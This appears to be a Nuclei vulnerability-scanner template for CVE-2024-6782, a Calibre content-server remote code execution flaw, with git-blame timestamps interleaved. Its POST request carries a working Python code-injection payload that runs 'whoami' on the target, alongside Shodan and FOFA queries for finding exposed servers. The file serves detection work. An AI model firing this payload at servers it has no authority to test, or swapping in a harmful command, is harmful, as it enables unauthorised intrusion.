2024-08-01 05:44:57 +00:00
|
|
|
|
id: CVE-2024-6782
|
|
|
|
|
|
|
|
|
|
info:
|
|
|
|
|
name: Calibre <= 7.14.0 Remote Code Execution
|
|
|
|
|
author: DhiyaneshDK
|
|
|
|
|
severity: critical
|
|
|
|
|
description: |
|
|
|
|
|
Unauthenticated remote code execution via Calibre’s content server in Calibre <= 7.14.0.
|
|
|
|
|
reference:
|
|
|
|
|
- https://starlabs.sg/advisories/24/24-6781/
|
|
|
|
|
metadata:
|
|
|
|
|
verified: true
|
|
|
|
|
shodan-query: html:"Calibre"
|
|
|
|
|
fofa-query: "Server: calibre"
|
|
|
|
|
max-requeset: 1
|
|
|
|
|
tags: cve,cve2024,calibre,rce
|
|
|
|
|
|
|
|
|
|
http:
|
2024-08-01 07:11:00 +00:00
|
|
|
|
- raw:
|
|
|
|
|
- |
|
|
|
|
|
GET /interface-data/books-init HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Referer: {{RootURL}}
|
|
|
|
|
|
|
|
|
|
extractors:
|
|
|
|
|
- type: json
|
|
|
|
|
name: book_ids
|
|
|
|
|
internal: true
|
|
|
|
|
json:
|
|
|
|
|
- '.search_result.book_ids[0]'
|
|
|
|
|
|
2024-08-01 05:44:57 +00:00
|
|
|
|
- raw:
|
|
|
|
|
- |
|
|
|
|
|
POST /cdb/cmd/list HTTP/1.1
|
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
2024-08-01 07:11:00 +00:00
|
|
|
|
[
|
|
|
|
|
["template"],
|
2024-08-01 07:37:41 +00:00
|
|
|
|
"",
|
2024-08-01 07:11:00 +00:00
|
|
|
|
"",
|
|
|
|
|
"",
|
|
|
|
|
{{book_ids}},
|
|
|
|
|
"python:def evaluate(a, b):\n import subprocess\n try:\n return subprocess.check_output(['cmd.exe', '/c', 'whoami'])\n except Exception:\n return subprocess.check_output(['sh', '-c', 'whoami'])\n"
|
|
|
|
|
]
|
2024-08-01 05:44:57 +00:00
|
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
2024-08-01 07:11:00 +00:00
|
|
|
|
- type: regex
|
|
|
|
|
part: body
|
|
|
|
|
regex:
|
|
|
|
|
- "b'([^']+)"
|
|
|
|
|
|
2024-08-01 05:44:57 +00:00
|
|
|
|
- type: word
|
2024-08-01 07:11:00 +00:00
|
|
|
|
part: content_type
|
2024-08-01 05:44:57 +00:00
|
|
|
|
words:
|
2024-08-01 07:11:00 +00:00
|
|
|
|
- "application/json"
|
2024-08-01 05:44:57 +00:00
|
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
|
|
|
|
- 200
|
2024-08-06 07:32:08 +00:00
|
|
|
|
# digest: 4b0a00483046022100ab0c6eb74bbcbd25752d1cb038e1250aae3a1ca7939f89b55c54300ce331fb7f022100e4d96a62a8a103243f43549987b0cbd496172100fa325a425975b072d0482332:922c64590222798bb761d5b6d8e72950
|